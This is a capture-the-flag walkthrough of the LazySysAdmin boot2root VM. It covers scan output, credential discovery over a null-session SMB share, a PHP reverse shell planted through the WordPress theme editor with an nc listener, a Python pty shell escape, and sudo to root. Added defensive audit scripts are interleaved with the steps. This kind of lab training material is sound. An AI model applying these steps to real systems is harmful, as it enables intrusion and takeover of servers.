LazySysAdmin: 1 – Walkthrough

Machine Information

  • Name: LazySysAdmin: 1
  • Date release: 20 Sep 2017
  • Author: Togie Mcdogie (Twitter: @TogieMcdogie)
  • Difficulty: Beginner – Intermediate
  • Description: Boot2root created out of frustration from failing my first OSCP exam attempt.
  • Download:,205/


I ran netdiscover to find the IP of the vulnerable box.

netdiscover -i eth0 

I got the results, then ran an nmap scan.

nmap -vv -Pn -sS -A -sC -p- -T 3 --script-args=unsafe=1 -oA detailed_scan -n

# Nmap 7.25BETA2 scan initiated Wed Oct 4 09:53:30 2017 as: nmap -vv -Pn -sS -A -sC -p- -T 3 --script-args=unsafe=1 -oA detailed_scan -n
 Nmap scan report for
 Host is up, received arp-response (0.00090s latency).
 Scanned at 2017-10-04 09:53:32 EDT for 28s
 Not shown: 65529 closed ports
 Reason: 65529 resets
 22/tcp open ssh syn-ack ttl 64 OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux;
 protocol 2.0)
 | ssh-hostkey:
 | 1024 b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA)
 | 2048 58:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA)
 | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDL4kUdp6Gej0kmVuGrpPSUUIqYmMsiqjbZ4PFCmji
 | 256 61:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA)
 80/tcp open http syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu))
 |_http-generator: Silex v2.2.7
 | http-methods:
 |_ Supported Methods: GET HEAD POST OPTIONS
 | http-robots.txt: 4 disallowed entries
 |_/old/ /test/ /TR2/ /Backnode_files/
 |_http-server-header: Apache/2.4.7 (Ubuntu)
 |_http-title: Backnode
 139/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
 445/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
 3306/tcp open mysql syn-ack ttl 64 MySQL (unauthorized)
 6667/tcp open irc syn-ack ttl 64 InspIRCd
 | irc-info:
 | server: Admin.local
 | users: 1.0
 | servers: 1
 | chans: 0
 | lusers: 1
 | lservers: 0
 | source ident: nmap
 | source host:
 |_ error: Closing link: (nmap@ [Client exited]
 MAC Address: 00:0C:29:46:BB:56 (VMware)
 Device type: general purpose
 Running: Linux 3.X|4.X
 OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
 OS details: Linux 3.2 - 4.4
 TCP/IP fingerprint:

Uptime guess: 0.004 days (since Wed Oct 4 09:48:19 2017)
 Network Distance: 1 hop
 TCP Sequence Prediction: Difficulty=263 (Good luck!)
 IP ID Sequence Generation: All zeros
 Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
 |_clock-skew: mean: -3s, deviation: 0s, median: -3s
 | nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
 | Names:
 | LAZYSYSADMIN<00> Flags: <unique><active>
 | LAZYSYSADMIN<03> Flags: <unique><active>
 | LAZYSYSADMIN<20> Flags: <unique><active>
 | WORKGROUP<00> Flags: <group><active>
 | WORKGROUP<1e> Flags: <group><active>
 | Statistics:
 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 |_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 | p2p-conficker:
 | Checking for Conficker.C or higher...
 | Check 1 (port 34402/tcp): CLEAN (Couldn't connect)
 | Check 2 (port 8449/tcp): CLEAN (Couldn't connect)
 | Check 3 (port 51322/udp): CLEAN (Failed to receive data)
 | Check 4 (port 50819/udp): CLEAN (Failed to receive data)
 |_ 0/4 checks are positive: Host is CLEAN or ports are blocked
 | smb-os-discovery:
 | OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
 | Computer name: lazysysadmin
 | NetBIOS computer name: LAZYSYSADMIN
 | Domain name:
 | FQDN: lazysysadmin
 |_ System time: 2017-10-04T23:53:48+10:00
 | smb-security-mode:
 | account_used: guest
 | authentication_level: user
 | challenge_response: supported
 |_ message_signing: disabled (dangerous, but default)
 |_smbv2-enabled: Server supports SMBv2 protocol

 1 0.90 ms

Post-scan script results:
 | clock-skew:
 |_ -3s: Majority of systems scanned
 Read data files from: /usr/bin/../share/nmap
 OS and Service detection performed. Please report any incorrect results at .
 # Nmap done at Wed Oct 4 09:54:00 2017 -- 1 IP address (1 host up) scanned in 31.20 seconds
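The scan above is long, and the findings that matter for hardening are buried in it (SMB answering a guest session, SMB signing disabled, MySQL reachable from the network). The following is an added example, not part of the original walkthrough: a small parser for nmap's normal output format that pulls out the open ports with their version strings and the host-script key/value pairs, then turns them into hardening notes. The sample input is a trimmed, constructed copy of the scan output shown above (the address 192.0.2.10 is a documentation address standing in for the lab IP).

```python
import re

# Constructed sample: trimmed copy of the nmap normal-format output above,
# with a documentation-range address in place of the lab IP.
SAMPLE_NMAP = """\
Nmap scan report for 192.0.2.10
Host is up, received arp-response (0.00090s latency).
Not shown: 65529 closed ports
PORT     STATE SERVICE     REASON         VERSION
22/tcp   open  ssh         syn-ack ttl 64 OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http        syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Silex v2.2.7
| http-robots.txt: 4 disallowed entries
|_/old/ /test/ /TR2/ /Backnode_files/
139/tcp  open  netbios-ssn syn-ack ttl 64 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn syn-ack ttl 64 Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3306/tcp open  mysql       syn-ack ttl 64 MySQL (unauthorized)
6667/tcp open  irc         syn-ack ttl 64 InspIRCd
Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol
"""

# One port line: "<port>/<proto> <state> <service> <reason...> <version...>"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(open|closed|filtered)\s+(\S+)\s*(.*)$")


def parse_nmap(text):
    """Return {"ports": [...], "host_scripts": {...}} from nmap normal output.

    Script lines ("| key: value" / "|_ key: value") are attached to the port
    they follow, or to the host once "Host script results:" has been seen.
    """
    result = {"ports": [], "host_scripts": {}}
    current_scripts = None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port, proto, state, service, rest = m.groups()
            # Drop the reason column ("syn-ack ttl 64") so only the version remains.
            version = re.sub(r"^\S+-ack(?: ttl \d+)?\s*", "", rest).strip()
            entry = {"port": int(port), "proto": proto, "state": state,
                     "service": service, "version": version, "scripts": {}}
            result["ports"].append(entry)
            current_scripts = entry["scripts"]
            continue
        if line.startswith("Host script results:"):
            current_scripts = result["host_scripts"]
            continue
        if line.startswith("|") and current_scripts is not None:
            body = line.lstrip("|_").strip()
            if ":" in body:
                key, _, value = body.partition(":")
                current_scripts[key.strip()] = value.strip()
    return result


def open_services(parsed):
    """(port, service, version) for every open port, in scan order."""
    return [(p["port"], p["service"], p["version"])
            for p in parsed["ports"] if p["state"] == "open"]


def findings(parsed):
    """Hardening notes derived from the parsed scan."""
    notes = []
    hs = parsed["host_scripts"]
    if hs.get("message_signing", "").startswith("disabled"):
        notes.append("SMB signing disabled: set 'server signing = mandatory' in smb.conf")
    if hs.get("account_used") == "guest":
        notes.append("SMB accepted a guest/null session: review 'map to guest' and guest shares")
    for port, service, _version in open_services(parsed):
        if service == "mysql":
            notes.append(f"MySQL listening on port {port}: bind it to 127.0.0.1 unless remote access is required")
    for p in parsed["ports"]:
        if p["service"] == "http" and "http-robots.txt" in p["scripts"]:
            notes.append(f"robots.txt on port {p['port']} advertises paths ({p['scripts']['http-robots.txt']}); "
                         "robots.txt is not access control")
    return notes


if __name__ == "__main__":
    parsed = parse_nmap(SAMPLE_NMAP)
    for port, service, version in open_services(parsed):
        print(f"{port:>5} {service:<12} {version}")
    for note in findings(parsed):
        print("-", note)
```

The same parser works on the `-oN` file that `-oA detailed_scan` writes (`detailed_scan.nmap`); the greppable `-oG` and XML `-oX` outputs have different layouts and need their own readers.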

I found ports 80, 139 and 445 open, so I ran Nikto and enum4linux.

nikto -h -p 80

 - Nikto v2.1.6
 + Target IP:
 + Target Hostname:
 + Target Port: 80
 + Start Time: 2017-10-04 09:55:18 (GMT-4)
 + Server: Apache/2.4.7 (Ubuntu)
 + Server leaks inodes via ETags, header found with file /, fields: 0x8ce8 0x5560ea23d23c0
 + The anti-clickjacking X-Frame-Options header is not present.
 + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect
 against some forms of XSS
 + The X-Content-Type-Options header is not set. This could allow the user agent to render the
 content of the site in a different fashion to the MIME type
 + No CGI Directories found (use '-C all' to force check all possible dirs)
 + OSVDB-3268: /old/: Directory indexing found.
 + Entry '/old/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
 + OSVDB-3268: /test/: Directory indexing found.
 + Entry '/test/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
 + OSVDB-3268: /Backnode_files/: Directory indexing found.
 + Entry '/Backnode_files/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
 + "robots.txt" contains 4 entries which should be manually viewed.
 + Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final
 release) and 2.2.29 are also current.
 + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
 + OSVDB-3268: /apache/: Directory indexing found.
 + OSVDB-3092: /apache/: This might be interesting...
 + OSVDB-3092: /old/: This might be interesting...
 + Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.22
 + Uncommon header 'x-ob_mode' found, with contents: 0
 + OSVDB-3092: /test/: This might be interesting...
 + /info.php: Output from the phpinfo() function was found.
 + OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found.
 This gives a lot of system information.
 + OSVDB-3233: /icons/README: Apache default file found.
 + /info.php?file= Output from the phpinfo() function was found.
 + OSVDB-5292: /info.php?file= RFI from RSnake's list
 ( or from
 + Uncommon header 'link' found, with contents: <
 rest_route=/>; rel=""
 + /wordpress/: A WordPress installation was found.
 + /phpmyadmin/: phpMyAdmin directory found
 + 7690 requests: 0 error(s) and 27 item(s) reported on remote host
 + End Time: 2017-10-04 09:56:06 (GMT-4) (48 seconds)
 + 1 host(s) tested

enum4linux -a

 Starting enum4linux v0.8.9 ( ) on Wed Oct 4 10:57:17 2017

 | Target Information |
 Target ...........
 RID Range ........ 500-550,1000-1050
 Username ......... ''
 Password ......... ''
 Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
 | Enumerating Workgroup/Domain on |
 [+] Got domain/workgroup name: WORKGROUP

 | Nbtstat Information for |
 Looking up status of
 LAZYSYSADMIN <00> - B <ACTIVE> Workstation Service
 LAZYSYSADMIN <03> - B <ACTIVE> Messenger Service
 LAZYSYSADMIN <20> - B <ACTIVE> File Server Service
 WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
 WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections

MAC Address = 00-00-00-00-00-00

 | Session Check on |
 [+] Server allows sessions using username '', password ''

 | Getting domain SID for |
 Domain Name: WORKGROUP
 Domain Sid: (NULL SID)
 [+] Can't determine if host is part of domain or part of a workgroup

 | OS information on |
 [+] Got OS info for from smbclient: Domain=[WORKGROUP] OS=[Windows 6.1]
 Server=[Samba 4.3.11-Ubuntu]
 [+] Got OS info for from srvinfo:
 platform_id : 500
 os version : 6.1
 server type : 0x809a03

 | Users on |
 Use of uninitialized value $users in print at ./ line 874.
 Use of uninitialized value $users in pattern match (m//) at ./ line 877.

Use of uninitialized value $users in print at ./ line 888.
 Use of uninitialized value $users in pattern match (m//) at ./ line 890.

 | Share Enumeration on |
 WARNING: The "syslog" option is deprecated
 Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
 Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]

Sharename Type Comment
 --------- ---- -------
 print$ Disk Printer Drivers
 share$ Disk Sumshare
 IPC$ IPC IPC Service (Web server)

Server Comment
 --------- -------

Workgroup Master
 --------- -------

[+] Attempting to map shares on
 //$ Mapping: DENIED, Listing: N/A
 //$ Mapping: OK, Listing: OK
 //$ Mapping: OK Listing: DENIED

 | Password Policy Information for |

[+] Attaching to using a NULL share

[+] Trying protocol 445/SMB...

[+] Found domain(s):

 [+] Builtin

[+] Password Info for Domain: LAZYSYSADMIN

[+] Minimum password length: 5
 [+] Password history length: None
 [+] Maximum password age: Not Set
 [+] Password Complexity Flags: 000000

[+] Domain Refuse Password Change: 0
 [+] Domain Password Store Cleartext: 0
 [+] Domain Password Lockout Admins: 0
 [+] Domain Password No Clear Change: 0
 [+] Domain Password No Anon Change: 0
 [+] Domain Password Complex: 0

[+] Minimum password age: None
 [+] Reset Account Lockout Counter: 30 minutes
 [+] Locked Account Duration: 30 minutes
 [+] Account Lockout Threshold: None
 [+] Forced Log off Time: Not Set

[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
 Minimum Password Length: 5
 | Groups on |

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

 | Users on via RID cycling (RIDS: 500-550,1000-1050) |
 [I] Found new SID: S-1-22-1
 [I] Found new SID: S-1-5-21-2952042175-1524911573-1237092750
 [I] Found new SID: S-1-5-32
 [+] Enumerating users using SID S-1-5-21-2952042175-1524911573-1237092750 and logon username
 '', password ''
 S-1-5-21-2952042175-1524911573-1237092750-500 *unknown*\*unknown* (8)
 S-1-5-21-2952042175-1524911573-1237092750-501 LAZYSYSADMIN\nobody (Local User)
 S-1-5-21-2952042175-1524911573-1237092750-513 LAZYSYSADMIN\None (Domain Group)
 [+] Enumerating users using SID S-1-5-32 and logon username '', password ''
 S-1-5-32-544 BUILTIN\Administrators (Local Group)
 S-1-5-32-545 BUILTIN\Users (Local Group)
 S-1-5-32-546 BUILTIN\Guests (Local Group)
 S-1-5-32-547 BUILTIN\Power Users (Local Group)
 S-1-5-32-548 BUILTIN\Account Operators (Local Group)
 S-1-5-32-549 BUILTIN\Server Operators (Local Group)
 S-1-5-32-550 BUILTIN\Print Operators (Local Group)
 [+] Enumerating users using SID S-1-22-1 and logon username '', password ''
 S-1-22-1-1000 Unix User\togie (Local User)

 | Getting printer info for |
 No printers returned.
 enum4linux complete on Wed Oct 4 10:58:40 2017

From the Nikto results I found a WordPress directory, /wordpress/, and a phpMyAdmin directory, /phpmyadmin/.

Using enum4linux I found a share that allows listing over a null session.

 //$ Mapping: OK, Listing: OK


Using the information I gathered, I was able to exploit the vulnerable machine.

I used smbclient to connect and check the contents of the shared folder.

smbclient //$

Under /wordpress I found wp-config.php. (wp-config.php is the WordPress configuration file; it contains the database name, username and password.)

I navigated to phpMyAdmin and used the credentials I found from wp-config.php.

Clicking on the table wp_users I encountered an error.

I used a manual query to bypass the error.

SELECT `user_login`, `user_pass`, `user_nicename`, `user_email` FROM wp_users;

I found the username and hashed password. I ran John to crack the hashed password.

While John was cracking the password, I tried to log in with “Admin” as the username and “TogieMYSQL12345^^” as the password.

Using the credentials Admin:TogieMYSQL12345^^ I was able to log in to WordPress.

I navigated to Appearance > Editor to edit 404.php of the twentyfifteen theme.

I copied the content of /usr/share/webshells/php/php-reverse-shell.php, then edited it to set the correct IP and port.

I set up a listener using nc.

nc -nlvp 443

I ran the reverse shell by browsing to

I got low privilege shell!
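The foothold above rests on two misconfigurations rather than on a software bug: a Samba share readable over a null session that contains wp-config.php, and a WordPress theme editor that lets an administrator write PHP into the web root. The following is an added example, not code from the walkthrough or from the LazySysAdmin VM: an audit script that reads an smb.conf, lists the shares Samba serves without credentials, walks their paths for files such as wp-config.php, and for each wp-config.php checks whether `DISALLOW_FILE_EDIT` is defined true (the WordPress constant that removes Appearance > Editor). The smb.conf text and the web root are constructed in a temporary directory by `build_demo()` so that the script runs offline; the option names (`guest ok`, `public`, `map to guest`, `server signing`, `path`) are real smb.conf parameters, the share layout is an assumption.

```python
import os
import re
import stat
import tempfile

SENSITIVE_NAMES = {"wp-config.php", ".env", "id_rsa", "config.php"}
YES = {"yes", "true", "1"}


def parse_smb_conf(text):
    """Minimal smb.conf reader: {section: {lowercase key: value}}; '#' and ';' start comments."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip()
            sections[current] = {}
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections


def guest_shares(conf):
    """Shares with a path that Samba serves without credentials (guest ok / public = yes)."""
    out = {}
    for name, opts in conf.items():
        if name.lower() == "global" or "path" not in opts:
            continue
        if any(opts.get(k, "no").lower() in YES for k in ("guest ok", "public")):
            out[name] = opts["path"]
    return out


def wp_config_issues(path):
    """Checks inside a wp-config.php: the theme editor is only removed by DISALLOW_FILE_EDIT."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    issues = []
    if not re.search(r"define\(\s*['\"]DISALLOW_FILE_EDIT['\"]\s*,\s*true\s*\)", text):
        issues.append("DISALLOW_FILE_EDIT not set, so the WordPress theme editor can write PHP")
    if re.search(r"define\(\s*['\"]DB_PASSWORD['\"]", text):
        issues.append("DB_PASSWORD is readable by anyone who can read this file")
    return issues


def audit_guest_shares(conf_text):
    """Weak global settings plus sensitive files reachable through guest shares."""
    conf = parse_smb_conf(conf_text)
    g = conf.get("global", {})
    findings = []
    if g.get("server signing", "default").lower() != "mandatory":
        findings.append("global: server signing is not mandatory")
    if g.get("map to guest", "never").lower() != "never":
        findings.append(f"global: map to guest = {g['map to guest']} turns unknown users into guest")
    for share, path in guest_shares(conf).items():
        for dirpath, _dirs, files in os.walk(path):
            for fname in sorted(files):
                if fname not in SENSITIVE_NAMES:
                    continue
                full = os.path.join(dirpath, fname)
                world = "world-readable" if os.stat(full).st_mode & stat.S_IROTH else "owner/group only"
                findings.append(f"share [{share}] exposes {full} ({world})")
                if fname == "wp-config.php":
                    findings.extend(f"share [{share}] {full}: {i}" for i in wp_config_issues(full))
    return findings


def build_demo(hardened=False):
    """Constructed layout: a web root exported as share$ with a wp-config.php inside.

    hardened=True produces the corrected configuration for comparison.
    """
    root = tempfile.mkdtemp(prefix="wpaudit_")
    os.makedirs(os.path.join(root, "wordpress"))
    cfg = os.path.join(root, "wordpress", "wp-config.php")
    with open(cfg, "w") as fh:
        fh.write("<?php\ndefine('DB_NAME', 'wordpress');\n"
                 "define('DB_PASSWORD', 'constructed-example');\n")
        if hardened:
            fh.write("define('DISALLOW_FILE_EDIT', true);\n")
    os.chmod(cfg, 0o640 if hardened else 0o644)
    return f"""
[global]
   workgroup = WORKGROUP
   map to guest = {'Never' if hardened else 'Bad User'}
   server signing = {'mandatory' if hardened else 'disabled'}

[share$]
   comment = Sumshare
   path = {root}
   guest ok = {'no' if hardened else 'yes'}
   read only = yes
"""


def run_demo(hardened=False):
    return audit_guest_shares(build_demo(hardened))


if __name__ == "__main__":
    for line in run_demo():
        print("-", line)
    print("hardened config:", run_demo(hardened=True) or "no findings")
```

On a real host the same functions run against `/etc/samba/smb.conf` with `audit_guest_shares(open("/etc/samba/smb.conf").read())`; `testparm -s` will first expand included files and defaults that this minimal reader does not follow.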

I checked /etc/passwd

cat /etc/passwd

 list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
 gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
 mysql:x:105:113:MySQL Server,,,:/nonexistent:/bin/false

Using the username togie, I tried to log in over SSH with the password I found in deets.txt.

CBF Remembering all these passwords.

Remember to remove this file and update your password after we push out the server.

Password 12345

ssh togie@
Using 12345 as the password I was able to log in.

I found out that I was in a restricted shell after running a few commands, dir and cd.

Using this command I was able to bypass the restricted shell.

python -c 'import pty; pty.spawn("/bin/sh")'

I ran id and found out that togie is in the sudo group.

I entered sudo su then used 12345 as password and got root.
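The restricted shell was never the boundary here: as soon as an interpreter is reachable it falls away, and the account was in the sudo group with a five-character password anyway. The following is an added example, not part of the walkthrough: a local audit that reads /etc/passwd and /etc/group and reports interactive accounts that are members of an administrative group, extra uid 0 accounts, and accounts whose shell is a restricted shell while they also hold sudo, which is the combination above. The passwd and group contents are constructed samples modelled on the fragment shown earlier (the togie entry and its rbash shell are assumptions, not taken from the VM).

```python
NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/bin/sync"}
RESTRICTED_SHELLS = {"/bin/rbash", "/usr/bin/rbash", "/bin/rksh"}

# Constructed sample files, modelled on the /etc/passwd fragment above.
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
mysql:x:105:113:MySQL Server,,,:/nonexistent:/bin/false
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
togie:x:1000:1000:togie,,,:/home/togie:/bin/rbash
"""
GROUP = """\
root:x:0:
sudo:x:27:togie
www-data:x:33:
togie:x:1000:
"""


def parse_passwd(text):
    """/etc/passwd -> {name: {uid, gid, home, shell}}."""
    users = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        name, _pw, uid, gid, _gecos, home, shell = line.split(":", 6)
        users[name] = {"uid": int(uid), "gid": int(gid), "home": home, "shell": shell}
    return users


def parse_group(text):
    """/etc/group -> {name: {gid, members}}."""
    groups = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        name, _pw, gid, members = line.split(":", 3)
        groups[name] = {"gid": int(gid), "members": [m for m in members.split(",") if m]}
    return groups


def groups_of(user, users, groups):
    """Primary group plus supplementary memberships listed in /etc/group."""
    primary = {g for g, info in groups.items() if info["gid"] == users[user]["gid"]}
    supplementary = {g for g, info in groups.items() if user in info["members"]}
    return primary | supplementary


def audit(passwd_text, group_text, admin_groups=("sudo", "wheel", "admin")):
    """Findings about accounts that can actually log in and what they can reach."""
    users = parse_passwd(passwd_text)
    groups = parse_group(group_text)
    findings = []
    for name, info in sorted(users.items()):
        if info["shell"] in NOLOGIN_SHELLS:
            continue  # service accounts without a login shell are out of scope
        admin = sorted(g for g in groups_of(name, users, groups) if g in admin_groups)
        if info["uid"] == 0 and name != "root":
            findings.append(f"{name}: uid 0 account besides root")
        if admin:
            findings.append(f"{name}: interactive account in admin group(s) {', '.join(admin)}")
        if info["shell"] in RESTRICTED_SHELLS and admin:
            findings.append(f"{name}: restricted shell {info['shell']} is no boundary, sudo grants full root")
    return findings


if __name__ == "__main__":
    for line in audit(PASSWD, GROUP):
        print("-", line)
```

On a live system call `audit(open("/etc/passwd").read(), open("/etc/group").read())`; sudoers rules granted outside the group (in /etc/sudoers or /etc/sudoers.d) are not covered by this check and need `sudo -l` per account.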

I navigated to /root to get proof.txt.

 Well done :)

Hope you learn't a few things along the way.


Togie Mcdogie
 Enjoy some random strings
